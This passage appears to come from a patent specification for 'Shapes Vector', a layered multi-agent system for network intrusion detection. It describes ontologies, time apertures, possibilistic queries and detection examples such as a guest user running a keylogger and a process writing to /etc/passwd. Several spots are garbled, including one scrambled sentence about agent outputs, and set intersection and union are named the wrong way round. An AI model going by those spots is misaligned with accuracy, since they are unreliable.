The human user may consider this situation anomalous: given their experience of the network, most high volume traffic emitters are identified quickly by one or more of the various IAs. While the telnet session is legitimate, in as much as the proper passwords have been provided, the situation bears further investigation.
To probe deeper, the User Avatar component of Shapes Vector, described more fully in Section 8 in Part 2 of the specification, can be used to directly query the detailed knowledge base the agents have built up behind to the (less-detailed) visualisation. The interaction in this situation might be as follows:
• human> answer what User is-logged-into Computer “MainServer”?
• gestalt> Relationship is-logged-into [User Boris, Computer MainServer]
This reveals a user name for the individual currently logged into the server. A further interaction might be:
• human> find all User where id=“Boris”?
• gestalt> Entity User (id=Boris, name=“Boris Wolfgang”, type=“guest user”)
An agent has deduced at some stage of knowledge processing that the user called Boris is logged in using a guest user account. The Shapes Vector user would be aware that this is also suspicious, perhaps eliciting a further question:
• human> answer what is-owned-by User Boris”?
• gestalt> Relationship is-owned-by [File passwords, User Boris]
• Relationship is-owned-by [Process keylogger, User Boris]
• Relationship is-owned-by [Process passwordCracker, User Boris]
The facts have, again, been deduced by one or more of the IA's during their processing of the original network facts. The human user, again using their own knowledge and inductive faculties, would become more suspicious. Their level of suspicion might be such that they take action to terminate Boris' connection to the main server.
In addition to this, the user could ask a range of possiblistic and probabilistic questions about the state of the network, invoking faculties in the agent Gestalt for more speculative reasoning.
3.4 Other Applications
The IA architecture disclosed herein lends itself to other applications. For example, it is not uncommon for the Defence community to have many databases in just as many formats. It is very difficult for analysts to peruse these databases in order to gain useful insight. There has been much effort aimed at considering how particular databases may be structured in order for analysts to achieve their objectives. The problem has proved to be difficult. One of the major hurdles is that extracting the analysts' needs and codifying them to structure the data leads to different requirements not only between analysts, but also different requirements depending on their current focus. One of the consequences is that in order to structure the data correctly, it must be context sensitive, which a relational database is not equipped to handle.
Shapes Vector can overcome many of the extant difficulties by permitting knowledge and deduction rules to be installed into an IA. This IA, equipped with a flexible user interface and strictly defined query language, can then parse the data in a database in order to arrive at a conclusion. The knowledge rules and analyst-centric processing are encoded in the IA, not in the structure of the database itself, which can thus remain context free. The Shapes Vector system allows incremental adjustment of the IA without having to re-format and restructure a database through enhancement of the IA, or through an additional IA with relevant domain knowledge. Either the IA makes the conclusion, or it can provide an analyst with a powerful tool to arrive at low level deductions that can be used to arrive at the desired conclusion.
4. Rules for Constructing an Agent
In Section 2 of this part of the specification, several rules governing agents were mentioned, e.g. no intra level communication and each agent must be context free within its domain of discourse. Nevertheless, there are still a number of issues, which need clarification to see how an agent can be constructed, and some of the resultant implications.
In a preferred arrangement the three fundamental rules that govern the construction of an agent are:
• 1. All agents within themselves must be context free;
• 2. If a context sensitive rule or deduction becomes apparent, then the agent must be split into two or more agents;
• 3. No agent can communicate with its peers in the same level. If an agent's deduction requires input from a peer, then the agent must be promoted to a higher level, or a higher level agent constructed which utilises the agent and the necessary peer(s).
In our current implementation of Shapes Vector, agents communicate with other entities via the traditional UNIX sockets mechanism as an instantiation of a component control interface. The agent architecture does not preclude the use of third party agents or systems. The typical approach to dealing with third party systems is to provide a “wrapper” which permits communication between the system and Shapes Vector. This wrapper needs to be placed carefully within the agent hierarchy so that interaction with the third party system is meaningful in terms of the Shapes Vector ontologies, as well as permitting the wrapper to act as a bridge between the third party system and other Shapes Vector agents. The wrapper appears as just another SV agent.
One of the main implications of the wrapper system is that it may not be possible to gain access to all of the features of a third party system. If the knowledge cannot be carried by the ontologies accessible to the wrapper, then the knowledge elements cannot be transported throughout the system. There are several responses to such cases:
• 1. The wrapper may be placed at the wrong level.
• 2. The Ontology may be deficient and in need of revision.
• 3. The feature of the third party system may be irrelevant and therefore no adjustments are required.
5. Agents and Time
In this section we discuss the relationship between the operation of agents and time. The two main areas disclosed are how the logic based implementation of agents can handle data streams without resorting to an embedded, sophisticated temporal logic, and the notion of synthetic time in order to permit simulation, and analysis of data from multiple time periods.
5.1 Data Streams and IA's
One of the fundamental problems facing the use of IA's in the Shapes Vector system is the changing status of propositions. More precisely, under temporal shifts, all “facts” are predicates rather than propositions. This issue is further complicated when we consider that typical implementations of an IA do not handle temporal data streams.
We address this problem by providing each IA with a “time aperture” over which it is currently processing. A user or a higher level agent can set the value of this aperture. Any output from an IA is only relevant to its time aperture setting (FIG. 10). The aperture mechanism allows the avoidance of issues such as contradictions in facts over time, as well providing a finite data set in what is really a data stream. In fact, the mechanism being implemented in our system permits multiple, non-intersecting apertures to be defined for data input.
With time apertures, we can “stutter” or “sweep” along the temporal domain in order to analyse long streams of data. Clearly, there are a number of issues, which still must be addressed. Chief amongst these is the fact that an aperture may be set which does not, or rather partially, covers the data set whereby a critical deduction must be made. Accordingly, strategies such as aperture change and multiple apertures along the temporal domain must be implemented in order to raise confidence that the relevant data is input in order to arrive at the relevant deduction.
While we are aware that we can implement apertures in order to supply us with useful deductions for a number of circumstances, it is still an open question on how to achieve an optimal set of sweep strategies for a very broad class of deductions where confidence is high that we obtain what we are scanning for. One area, which comes to mind, is the natural “tension” between desired aperture settings. For example, an aperture setting of 180 degrees (ie., the whole fact space) is desirable as this considers all data possible in the stream from the beginning of the epoch of capture to the end of time, or rather the last data captured. However, this setting is impractical from an implementation point of view, as well as introducing potential contradictions in the deductive process. On the other hand, a very small aperture is desirable in that implementation is easy along with fast processing, but can result in critical packets not being included in the processing scan.
Initial test of an agent, which understands portions of the HTIP protocol, has yielded anecdotal evidence that there may be optimum aperture settings for specific domains of discourse. IHIP protocol data from a large (5 GB) corpus were analysed for a large network. It was shown that an aperture setting of 64 packets produced the largest set of deductions for the smallest aperture setting while avoiding the introduction of contradictions.
The optimal aperture setting is of course affected by the data input, as well as the domain of discourse. However, if we determine that our corpus is representative of expected traffic, then default optimal aperture setting is possible for an agent. This aperture setting need only then be adjusted as required in the presence of contradicting deductions or for special processing purposes.
5.2 Temporal Event Mapping for Agents
In the previous section, we discussed how an agent could have time apertures in order to process data streams. The issue of time is quite important, especially when considering that it takes a finite amount of time for a set of agents to arrive at a deduction and present a visualisation. Also, a user may wish to replay events at different speeds in order to see security relevant patterns. To provide such facilities in Shapes Vector, we introduce the notion of a synthetic clock. All entities in the system get their current time from the synthetic clock rather than the real system clock. A synthetic clock can be set arbitrarily to any of the current or past time, and its rate of change can also be specified.
A synthetic clock allows a user to run the system at different speeds and set its notion of time for analysing data. The synthetic clock also permits a variety of simulations to be performed under a number of semantic assumptions (see Section 7 of this part of the specification)
The above is all very well, but Shapes Vector may at the same time be utilised for current real-time network monitoring as well as running a simulation. In addition, the user may be interested in correlating past analysis conditions with current events and vice versa. For example, given a hypothesis from an ongoing analysis, the user may wish to specify that if a set of events occur in specific real-time windows based on past event temporal attributes or as part of an ongoing simulation, then an alarm should be given and the results or specific attributes can flow bi-directionally between the past event analysis and the current event condition. Hence Shapes Vector should be able to supply multiple synthetic clocks and the agent instances running according to each clock must be distinguishable from each other. All synthetic clocks are contained in the Tardis that is discussed in detail in Part 5 of this specification.
6. Implications for Higher Level Agents
The criterion that all agents must be context free is in fact, not fully achievable. There are a number of influencing factors, but chief amongst these is time. An agent judged to be context free one year, may not be context free later in its lifecycle, despite no change to its content. For example, consider a simple agent responsible for analysing the headers of web traffic (HTTP) to determine which requests went via a proxy server. At the time such an agent is written it may be context free (or more precisely it's context is the universally accepted rules of HTTP transactions). However, future changes to the HTTP protocol or to the common practices used by web browsers or servers may cause it to become context sensitive despite no changes to the agent itself. That is, all deductions produced by the agent become true, only in the context of “how HTTP worked at the time the agent was written”.
The above tends to encourage all agents to hold only one simple or “atom” deduction. This then ensures context freedom over a very long period of time. However, there are at least a couple of practical difficulties to such an approach:
• 1. A definition of what constitutes an atom deduction that is valid for all of the architecture must be determined;
• 2. A very sophisticated criterion for placement of agents within the agent hierarchy is needed to the extent that a complete metalogic of semantics right across the agent architecture would be needed (practically impossible).
7. Higher Level Ontologies
Detail of how the ontologies contribute to the functioning of the Agent architecture is disclosed in this section. In particular, there is focus on the ontologies above level 1, and provision of a brief discourse of the two lowest levels.
7.1 Level 2
In developing the level 2 ontology, it became apparent that attempting the same approach as for level 1 would not work. Level 1 focuses very much on “concrete” objects (e.g. modems, computer) and deterministic concrete relationships (e.g. connection) in the form of a traditional first order logic. Adopting a similar approach for level 2 proved difficult in the light of the desirable criteria for higher level ontologies, namely that they should:
• Seek to embody a higher level of abstraction (relative to the previous, lower, level ontologies).
• Seek description in terms of “atomic” relationships for each abstraction level, from which more complex relationships can be built.
• Offer opportunities for fusion activities, which cannot be handled at, lower layers (since they would be context sensitive).
Given the above criteria, the identification of a set of orthogonal, higher-level object types or classes on which to base a context-free level 2 ontology was problematic. A more promising constructive methodology for level 2 was to focus less on objects in and of themselves (as the level 1 ontology had done) and instead to identify a set of fundamental operations and relationships. That is, to move towards a description in terms of higher-level logics.
The chosen approach for constructing the level 2 ontology was to consider the types of knowledge-based relations and operators an agent operating at level 2 would require to support Shapes Vector's security mission. Such agents would necessarily need to conduct semantic manipulations of basic objects and concepts embodied in level 1. Operators that remain generic (like those in level 1) were preferred over security-specific semantics. The key operators and relations present within the ontology are:
7.1.1 Relationships
These relationships may appear in both ontological statements (assertions) and also as clauses in ontological queries.
• Simple Set Theoretic Operators. A suite of common set-based relationships are incorporated, including set membership (Member_of), set disjunction (Intersection_of), set conjunction (Union_of), and Cartesian_product_of. These relationships provide the traditional basis for constructing more complex semantic relationships. Using such relationships we can, for example, express that computer “dialup.foo.net.au” is a member of the set of computers that have sent suspicious mail messages to server “www.bar.com” in the past day.
• Consistency Operators: Consistent_with, Inconsistent_with. The use of these relationships takes the form “X consistent_with Y” or “X inconsistent_with Y”. Since we are at a higher level, it is clear that contradictions will become apparent which are either invisible to the lower level agents, or as a result of their aperture settings, caused by a temporal context sensitivity. For example, we can use the operator to express the fact that a conclusion made by an e-mail agent that an e-mail originated at “nospam.com” is inconsistent with another observation made by a different agent that web traffic from the same machine reports its name as “dialup.foo.net.au”.
It is important to distinguish between this relationship and the traditional logical implies. We cannot construct a practical implementation of implies in our system. There are several well-known difficulties such as an implementation of a safe form of the “not” operator. Hence we have avoided the issue by providing a more restricted operator with a specific semantic which nevertheless serves our purposes for a class of problems.
• Based_on. The above Consistent_with and Inconsistent_with relationships are not sufficient for expressing practical semantics of consistency in Shapes Vector. Given the broad ranging domains of lower level agents, these relationships beg the question “consistent (or inconsistent) under what basis?”. Hence the Based_on clause which is used in the following manner “X Consistent_with Y Based_on Z”. The rules of such a logic may be derived from human expert knowledge, or may be automatically generated by a computational technique able to draw consistency relationships from a corpus of data. Here, Z represents consistency logic relevant to the particular context. An implication is that a simple form of type matching is advisable in order to prevent useless consistency logics -being applied to elements being matched for consistency. The type matching can be constructed by utilising the set theory operators.
• Predicated Existential Operator: Is_Sufficient_for. This relationship takes the form “X is_sufficient_for Y” and encapsulates the semantics that Y would be true if X could be established. That is, it is used to introduce a conditional assertion of X predicated on Y. This facility could be used, for example, to report that it would be conclusively shown that computer “dialup.foo.net.au” was a web server IF it were observed that “dialup.foo.net.au” had sent HTML traffic on port 80.
• Possiblistic Existential Operator: Possible (X). This relationship serves to denote that the fact contained within its parentheses has been deemed to be a definite possibility. That is, the generator of the statement has stated that while it may not be able to conclusively deduce the existence of the fact, it has been able to identify it as a possibility. This relationship is necessary in order to be able to handle negation and the various forms of possibility. Further discussion appears below. Any fact expressible in the level 1 or level 2 ontology may be placed within a Possible statement. The most typical use of this operator would be in a response to a possiblistic query (see below). Note that the possibility relation does not appear as an operator in a query.
7.1.2 Interrogative Operators
The above relationships (except for Possible) also appear as operators in queries made to the Agent Gestalt at level two. However, there are a number of operators, which do not have a corresponding relation in the ontology. These are now discussed:
• the usual boolean operators which can also be expressed in terms of set theory are supplied.
• asserting (Y). This unary operator allows us to ask whether the proposition X is true if we assume Y is a given (ie. whether X can be established through the temporary injection of fact Y into the universe). Y may or may not be relevant in deciding the truth of X hence the operator is in stark contrast to the Is_Sufficient_For relation where the truth of Y directly implies the truth of X. There are some interesting complexities to implementing the asserting operator in a Prolog environment. The assertion must take place in a manner such that it can override a contrary fact. For most implementations, this means ensuring that it is at the head of any identical clauses. One of the implementation methods is to first work out whether Y is true in the first place and if not, place in a term with a different arity and direct the query to the new term in order to bypass the other search paths.
• Is_it_possible. This operator allows for possiblistic queries. It takes the form “Is_it_possible X” where X may be any level 1 or level 2 ontological construct. Specifically, ontological relationships may be used, e.g., “Is_it_possible X [relationship (e.g. Member_of)] Y”. Is_it_possible can be used in conjunction with the asserting operator (e.g. Is_it_possible X [operator] Y asserting Z) to perform a possiblistic query where one or more facts are temporarily injected into the universe. Using this operator we can, for example, issue a query asking whether it is possible that computer “dialup.foobar.net.au” is a web server. Furthermore we could ask whether based on an assumption that computer “dialup.foo.net.au” is connected via a modem, the computer makes use of a web proxy. Is_it_possible provides a means for returning results from predicates as ground facts rather than insisting that all queries resolve to an evaluated proposition (see Section 3.2 of this part). The evaluation result of a query of this nature will return either no, or maybe. The maybe result occurs if it is possible or there is no condition found which bars the condition, or no if a condition can be found in the universe preventing its possibility.
• Is_it_definitely possible. This operator is not orthogonal to the previous one. The evaluation result is either yes, or no. The difference between this operator and the previous one is that for it to return true, there must be a set of conditions in the universe which permit the result to be true, and the relation possibility exists.
• Under_what_circumstances. This operator provides for a reverse style of possiblistic querying in which a target fact is given and the queried entity is called upon to provide the list of all conditions that would need to hold true for that fact to be established. For example we can ask under what conditions would it be conclusively true that a guest user had remotely logged into the computer “dialup.foobar.net.au”.
• Not is one of the more interesting operators. There has been much discussion over the years on how to implement the equivalent of logical negation. The problems in doing so are classic and no general solution is disclosed. Rather, three strategies are generated that provide an implementation approach, which satisfies our requirement for a logical negation operator. For the Shapes Vector system, any Not operator is transferred into a possiblistic query utilising negation as failure. Not (x) is transformed to the negation of Is_it_possible (X). This is where negation operation maps ‘no’ to ‘yes’, and maps ‘maybe’ to ‘maybe’. Doing so requires us to have the user make an interpretation of the result based on fixed criteria. However, it is claimed that such an interpretation is simple. For example: a user may inquire as to whether it is “not true that X is connected to Y”. This would be transformed into a query as to whether it was possible that X is connected to Y and the result of that second query negated. If the system determined that it might be possible that X is connected to Y, the final response would be that it might be possible that it is “not true that X is connected to Y.” Alternatively, if it could be established that the connection was not possible, the final response would be yes it is “not true that X is connected to Y.”
The above possibility operators cause some interesting implementation issues. It needs to be possible to detect the reason why a query fails, ie. did it fail due to a condition contradicting success (hard fail), or that simply all goals are exhausted in trying to find a match (soft fail). As a partial solution to this issue, we must add to the criteria for constructing an agent. A further criterion is that an agent's clauses are constructed in two sets: case for the positive, and case for the negative. We attempt to state explicitly the negative aspects. These negative clauses, if unified, cause a hard fail to be registered. It is fairly simple to deduce here that we cannot guarantee completeness of an agent across its domain of discourse. However, a soft fail interpretation due to incompleteness of the part of the agent remains semantically consistent with the logic and the response to the user.
7.2 Level 3 and Above
As can be seen, the main characteristics of level 2 when compared to level 1 are the inclusion of possibilistic reasoning and the introduction of the ability to define semantics for consistency. If we carry this abstraction path (ie. first order logic to possibilistic logic) one step further we can surmise that the next fundamental step should be an ontology which deals with probabilistic logic. For example, semantics to support operators such as “likely”.
Initial operators designated for level three include “is it likely” which has a set of qualifiers in order to define what “likely” means. Interpretation based on specific user profiles will be needed hence user Avatars (see next section in this portion of the specification) are present in order to help interpret abstract user queries into precise, complex ontology. It is suggested that any levels beyond this become much more mission specific and will begin to include security specific relationships.
In actual fact, the labelled levels “2” and “3” may not be actually be located consecutively at the second and third layers of the agent hierarchy. Due to the need for avoiding context sensitivity within a level when introducing new agents, there will always be a need to introduce intermediate levels in order to cater for fusers in a way that does not necessitate the expansion of the adjacent levels' ontologies. Hence we refer here to the labels “level 2” and “level 3” as ontological delineators. Indeed, current expectations are that the possibilistic reasoning parts of an ontology will be introduced around level six due to fusing agents which are to be introduced for Shapes Vector's security mission.
7.3 An Example of Possiblistic Querying
Consider a simple IA/fuser designed to accept input from two knowledge sources—one describing network hosts and the ports they listen on, and another describing local file system accesses on a network host. By fusing such inputs, the agent deduces situations where security has been compromised.
Such an agent may contain the following rules (specified here in pseudo-English): In reality, the deductive rules within such an agent would be considerably more complex and would involve many additional factors. The rules are simplified here for illustrative purposes.
• 1. If a process Y listens on port P AND P is NOT a recognised port <1024 THEN Y is a “non-system daemon”.
• 2. If a process Y is a non-system daemon AND Y wrote to system file F THEN Y “corrupted” F.
Consider the situation where, in analysing the data for a time window, the agent receives the following input:
• Process 1234 listens on port 21
• Process 3257 has written to !etc/passwd
• Process 1234 has written to /etc!passwd
• Process 3257 listens on port 31337
• Process 987 listens on port 1022
• Port 21 is a recognised port
The following possiblistic queries may be issued to the agent:
Is it possible Process 1234 corrupted/etc/passwd?
In this case, the agent would generate a Hard Fail (i.e. a “definite no”) since a contradiction is encountered. The relationship “corrupted” can only be true if Rule 1 has classified Process 1234 as a “non-system daemon”, but that can only happen if Port 21 is not “recognised”. This last fact is explicitly contradicted by the available facts.
Is_it_possible Process 987 corrupted/etc/passwd?
In this case, the agent would generate a Soft Fail (i.e., a “maybe”) since, while no contradiction is present, neither is there sufficient evidence to conclusively show Process 987 has corrupted /etc/passwd. Rule 1 can classify Process 987 as a non-system daemon, but there are no observations showing that Process 987 wrote to /etc/passwd (which does not, in itself mean that it did not, given the agent's inherently incomplete view of the world).
Under_what_circumstances could Process 987 have corrupted/etc/passwd?
In this case the agent would respond with the fact “Process 987 has written to /etc/passwd”, which is the missing fact required to show that the process corrupted /etc/passwd.
Is it possible Process 3257 corrupted/etc/passwd?
Not only is it possible that Process 3257 could have corrupted the file, there is sufficient evidence to show that it definitely occurred. That is, under normal predicate logic the rules would deduce the “corrupted” relationship. However, since the Is_It_Possible operator replies either “no or “maybe”, the agent in this case replies “maybe”.
Can you show that Process 3257 corrupted/etc/passwd?
This is a straight predicate (i.e., non-possiblistic) query. Since the facts support a successful resolution under the Rules 1 and 2, the agent replies “yes”.
7.4 An Example of the Use of Consistency
In this section, we describe a simple example showing the utility of the consistency logic for a security application.
Consider the case of a simple consistency agent, which understands the basics of the TCP protocol, and in particular is aware of the traditional “three-way handshake” involved in the establishment of a TCP connection. This agent would be able to recognise valid handshakes and report the consistency of the packet sequences they comprise. Consider the following input to such an agent:
• Packet L1 (type=“TCP SYN”)
• Packet L2 (type=“TCP SYN ACK”)
• L2 directly-follows L1
• Packet L3 (Type=“TCP ACK”)
• L3 directly-follows L2
For this input, the agent will recognise the validity of this handshake and be able to report consistency of the packet sequences by stating:
• (L2 directly-follows L1) Consistent_with (L3 directly-follows L2) Based_on “TCP Handshake (Packet L1 (type=\“TCP SYN\”), Packet L2 (type=\“TCP SYN ACK\”), Packet L3 (Type=\“TCP ACK\”))”
Alternatively, the same agent could be presented with an invalid handshake as input, for example:
• Packet X1 (type=“TCP SYN”)
• Packet X2 (type=“TCP SYN ACK”)
• X2 directly-follows X1
• Packet X3 (Type=“TCP RST”)
• X3 directly-follows X2
In this case the agent would recognise that it is invalid for a TCP implementation to complete two parts of the handshake and then spontaneously issue a Reset packet'0. It would represent this inconsistency by reporting:
• (X2 directly-follows X1) Inconsistent_with (X3 directly-follows X2) Based_on “TCP Handshake (Packet X1 (type\=“TCP SYN\”), Packet X2 (type=\“TCP SYN ACK\”), Packet X3 (Type=\“TCP RST\”))”
Such a statement of inconsistency may be directly interrogated by a user interested in anomalous traffic, or alternatively passed as input to a set of security-specific agents, which would correlate the observation with other input.
An interesting implementation issue arises when we consider the construction of consistency assertions. The number of assertions to describe consistency, e.g. for TCP/IP traffic, may be very large, or dependent on specified environments and it could be data driven. There is a surprisingly simple possibility for the automatic generation of consistency assertion sets. Very preliminary investigation has indicated that data mining methods on designated standard data corpus are very suited for generating assertion sets, which may then be used as the consistency logic. Data mining is extensively used in detecting variances in traffic, but has been less successful in detecting intrusions. However, data mining has shown to be very successful in characterising data, and thus is proving an exciting possibility for use in the Shapes Vector system for describing bases of consistency.
8. User Avatars
It is necessary to have an intelligent interface so that the user may interact with the agents as a Gestalt. Accordingly, a set of user avatars is constructed. These avatars preferably contain a level of intelligent processing as well as the usual query parsing as a result of in one example, commercial voice recognition packages. In order to maintain consistency, user avatars are apparent at all levels in the ontologies. This permits each avatar to be able to converse with the agents at its level, while still permitting control and communication methods with avatars above and below. Put simply, the same reasons for developing the agent hierarchy are applied to the avatar set. Given the nature of an avatar, it may be argued by some that there is little difference between an agent in Gestalt, and the avatar itself. Avatars and Gestalt agents are distinguished by the following characteristics:
• Agents deal with other agents and Avatars.
• Avatars deal with agents and users.
• Avatars can translate user queries into precise ontology based on specific user driven adaptive processes to resolve context.
• Further to the above, Avatars store user profiles in a manner so as to interpret different connotations based on specific user idiosyncrasies. For example, the use of the probabilistic logic based queries where the term likely can be weighted differently according to each user.
One of the activities expected of Avatars in the Shapes Vector system is to modify queries so that they may be made more precise before presentation to the Gestalt. For example, at a high layer of abstraction, a user may initiate the query “I have observed X and Y, am I being attacked?”. An Avatar, given a user profile, may modify this query to “Given observations X, Y, based on Z, is it likely that a known attack path exists within this statistical profile”.
9. Further Comments on the Architecture
The hierarchical layering of the architecture with interleaved ontologies provides a strong advantage to Shapes Vector. Each ontology provides a filtering process for the deductions and knowledge transfer between levels. This helps “stabilise” and reduce context sensitivity. It also permits a strong method for checking the validity of component construction. However, a price is paid: the filtering between layers implies that the potential of each agent to contribute to the Gestalt is constrained. A particular agent may be able to undertake a variety of relevant deductions but these may be “strained” or “filtered” as the agent passes its knowledge through an ontology layer. Hence the theoretical full potential of the Gestalt is never actually realisable.
In order to overcome the above constraint in a sensible, practical and useful manner, it is necessary to review continuously the ontology layers in the search for bringing new relationships and objects into “first class” status so that it may become part of the ontology itself. That is, lessen the filtering process in a controlled manner. To do so however, requires much thought since an incorrect change in an ontology level can wreak havoc with the Gestalt operation. Of course it is possible to pass richer knowledge statements by using attributes through the ontology layers. However, it becomes the user's responsibility to ensure that the receiving agents can make sense of the additional attributes.
10.1 AAFID
Researchers at Purdue University have designed and implemented an agent-based architecture for Intrusion Detection, called AAFID (Autonomous Agents for Intrusion Detection) [Spafford, E and Zanboni, D., “Intrusion detection using Autonomous Agents”, Journal of computer Networks, v 34, pages 547-570,2000]. This architecture is based around a fundamental paradigm of distributed computation. One or more software agents run on each protected host of a network, communicating any events of interest to a single “Transceiver” running on the host. This component can perform some host-level fusion of alerts, but principally exists to forward significant observations to a “Monitor” process, which has an even broader purview.
This architecture at first appears to have similarities to the approach described herein, in that it supports multiple autonomous entities (each with a particular field of expertise) arranged in a distributed structure with hierarchy-based filtering. The AAFID system, however, does not appear to have a concept of multiple abstraction layers—all agents, transceivers and monitors all reason within a single universe of discourse which, apparently, contains both low-level and fairly high-level concepts. Furthermore, the operation of these various entities seems to focus purely on a data driven model; there is no obvious scope for users to set goals for components, nor to directly query the internal knowledge state of the system. AAFID's hierarchical structuring of agents seems limited to a single rooted tree, as opposed to our system's support for generalised directed acyclic graph structures. There is also no obvious scope for possiblistic or probabilistic reasoning within the AAFID architecture coupled with orthogonal semantic ontology layers.
10.2 Comparison with the Bass' Comments
The following discussion providing some background to the invention is intended to facilitate a better understanding of the invention. However, it should be appreciated that the discussion is not an acknowledgment or admission that any of the material referred to was published, known or part of the common general knowledge as at the priority date of the application.
In an edition of the Communications of the ACM “Intrusion Detection Systems & Multisensor Fusion: Creating Cyberspace Situational Awareness”, in Communications of the ACM 43(4), April 2000 Bass speculates on the future architecture requirements for Intrusion Detection Systems. In particular, he discusses the need for data abduction and points to the requirement for three main levels of semantic ascension.
The Shapes Vector architecture shows some necessary implementation strategies and architectural modifications in order to achieve that goal state. In particular Shapes Vector views the concept ascension requirement as a continuum where at any point in the AI agent Gestalt one “sees” knowledge production on looking “up”, and data supply looking “down”. The three main levels in the Shapes Vector Gestalt are delineated by the methods and logics used (ie. first order predicate, possiblistic and probabilistic), rather than some delineation as to whether there is information, data, or knowledge as depicted in FIG. 13. Bass requirements for a “discovery module etc” become less important in the Shapes Vector architecture as any such function is a pervasive part of the system and is distributed amongst more primitive functions. The Agent Gestalt feeds the visualisation engines rather than some specific event though earlier papers do tend to indicate a separate module and as such those papers are a little misleading.
11. A Multi-Abstractional Framework for Shapes Vector Agents
The Shapes Vector Knowledge Architecture (SVKA) is intended to provide a framework, in which large numbers of Intelligent Agents may work collaboratively, populating layers of a highly ordered “Gestalt”. Previous definitions of the SVKA have focussed primarily on macro-aspects of the architecture, describing a system in which each layer of the Gestalt represents a distinct universe of discourse as described by the ontology associated with it.
Experience with building collaborative Intelligent Agent systems for Shapes Vector has highlighted the desirability of a more flexible model, one that allows for the subdivision of these “ontology layers” into a number of sub-layers. Each sub-layer in such a divided model shares a common universe of discourse (i.e., all reference a common ontology). Intelligent Agents can populate any of these various sub-layers, allowing for the construction of systems capable of very general forms of data fusion and co-ordination.
Furthermore, it is envisaged that future requirements on the SVKA will involve the necessity of maintaining several “parallel universes of discourse” (e.g., running a subGestalt in the domain of Security in parallel with another sub-Gestalt in the domain of EM Security). Such parallel universes may have entry and exit points into one another (at which appropriate translations take place). They may furthermore share similar abstractional levels, or may even overlap the abstractional levels of multiple other universes.
In order to satisfy these two demands, the SVKA definition requires elaboration. In this paper we undertake a redefinition of the architecture which expands it in a number of ways to meet these requirements. Key features are:
• The SVKA Gestalt is divided into an arbitrary number of Locales,
• A Universe of Discourse and an Instance Number identify each Locale,
• Each Locale contains a number of levels at which Intelligent Agents may reside.
• A Locale may optionally nominate a single entry point: a remote locale and a level within that locale, from which input data is received into the locale,
• A Locale may optionally nominate a single exit point: a remote locale and a level within that locale, to which output data is sent from the locale.
11.1 Concepts
The Shapes Vector Knowledge Architecture (SVKA) contains exactly one Shapes Vector Gestalt Framework (SVGF) or “Gestalt”. The Gestalt is an abstract entity in which groups of collaborating software agents may be placed.
The Shapes Vector Gestalt Framework contains an arbitrary number of Shapes Vector Gestalt Locales (SVGLs) or “Locales”. A Locale is an abstract entity in which hierarchies of collaborating software agents may be placed. The defining characteristic of a Locale is that it is intimately tied to exactly one Universe of Discourse (UoD). For each UoD there may be multiple Locales simultaneously active, thus to distinguish these we also tag each Locale with an instance ID. This is unique only within the context of all Locales tied to the same UoD. For example there can exist a Locale with UoD “Level 1 Cyber Ontology”, instance 0 simultaneous with a Locale with UoD “Level 2 Cyber Ontology”, instance 0. However two Locales with UoD “Level 1 Cyber Ontology” and instance 0 cannot co-exist.
Each Shapes Vector Gestalt Locale is divided into an arbitrary number of Shapes Vector Gestalt Locale Levels (SVGLLs) or “Levels”. A Level is an abstract entity in which a non-cooperating set of agents may be placed. Each Level has a unique Level Number within the Locale (a zero or positive real number); Levels are notionally ordered into a sequence by their Level Numbers.
In addition to a UoD and instance ID, each Locale also optionally possesses two additional attributes: an entry point and an exit point. Each refers to a Level of a remote Locale, that is each reference contains the UoD and instance number of a Locale not equal to this Locale, and also nominates a particular (existent) Layer within that Locale. The entry point of a Locale defines a source of data, which may be consumed by the agents at the lowest Level of this Locale. The exit point of a Locale defines a destination to which data generated by agents in the highest Level of this Locale may be sent.
It is specifically forbidden for Locales within the Gestalt to be at any time directly or indirectly arranged in a cycle via their entry and/or exit points. That is, it must be impossible to draw a path from any point in any Locale back to that same point utilising entries and exits between Locales.
A Shapes Vector Gestalt Locale, which is divided into n Levels, contains n−1 Shapes Vector Assertion Routers (SVARs) or “Assertion Routers”. An Assertion Router is a concrete software entity whichTeceives input from one set of agents, performs some semantic-based filtering, then forwards the relevant sub-sections on to each of a set of agents in a second (disjoint) set. Each Assertion Router has an associated Level Number unique within the Locale (a zero or positive real number); Assertion outers are notionally ordered into a sequence by their Level Numbers. Furthermore, each Assertion Router has an Instance ID (a zero or positive integer) Furthermore, which is globally unique.
There is a one-to-one mapping between Locale Level Numbers and Assertion Router Level Numbers, defined by the following relationship. The Assertion Router with Level Number n receives input from agents positioned in Locale Level Number n and provides output to agents which are resident at the next Locale Level Number after n.
A Shapes Vector Intelligent Agent (SVIA) or “agent” is a concrete software entity which resides in exactly one Level of exactly one Locale within the Gestalt. Agents that reside above the lowest Level of the Locale may (optionally) receive input either from a direct source, or from the Assertion Router within the Locale which has the next lowest Level Number (or both). An agent that resides at the lowest Level of Locale may (optionally) receive input either from a direct source, or from the Assertion Router present in the entry point remote Locale (if one was specified) which has a Level Number equal to the Level defined in the entry point specification (or both).
Agents which reside below the highest Level of the Locale may (optionally) provide output to either a direct sink, or to the Assertion Router with Level may (optionally) provide output to either a direct sink, or to the Assertion equal to its own (or both). An Agent that resides at the highest Level of Router present in the exit point remote Locale (if one was specified) which has a Level Number equal to the Level defined in the exit point specification (or both).
An agent may never receive input from the same Assertion Router to which it provides output.
FIG. 12 illustrates these concepts for a single Locale Gestalt of 4 Levels, while FIG. 13 shows a more comprehensive example.
12. Summary
The knowledge-processing elements of the Shapes Vector system incorporate a broad variety of tools and techniques, some novel and some traditional, which combine to enact a flexible and powerful paradigm for multi-abstractional reasoning. The central feature of the approach disclosed herein is the methodology of bridging broad semantic gaps (in the embodiment described that is illustrated, from very simple observations about a computer network to high-level statements about the state of that network) by decomposition into a series of abstraction layers. This specification describes this layered architecture and also provides details about the forms of abstraction provided at the first three layers. These include epistemic logics for possiblistic reasoning (at level 2) and probabilistic reasoning (at level 3).
The key feature of the disclosed knowledge architecture that avoids difficulties of context sensitivity and ambiguity is its simple set of structuring rules. These provide strict guidelines for placement of agents within abstractional layers and limit the patterns of communication between agents (preferably prohibiting intra-level communication as well as insisting on passing through an ontology between layers).
Experience with building and using the Intelligent Agent Architecture it has shown it to be highly flexible, with the incorporation of “foreign” knowledge processing tools into the Shapes Vector Gestalt proving a “simple” exercise. The architecture has also shown itself to provide great potential for approaching knowledge-based deductive solutions to complex problems not only in the domain of computer security but also in many other domains, both related and unrelated.
The Intelligent Agent Architecture features specifically include:
• 1. An abstraction hierarchy with multiple layers separated by formal ontologies.
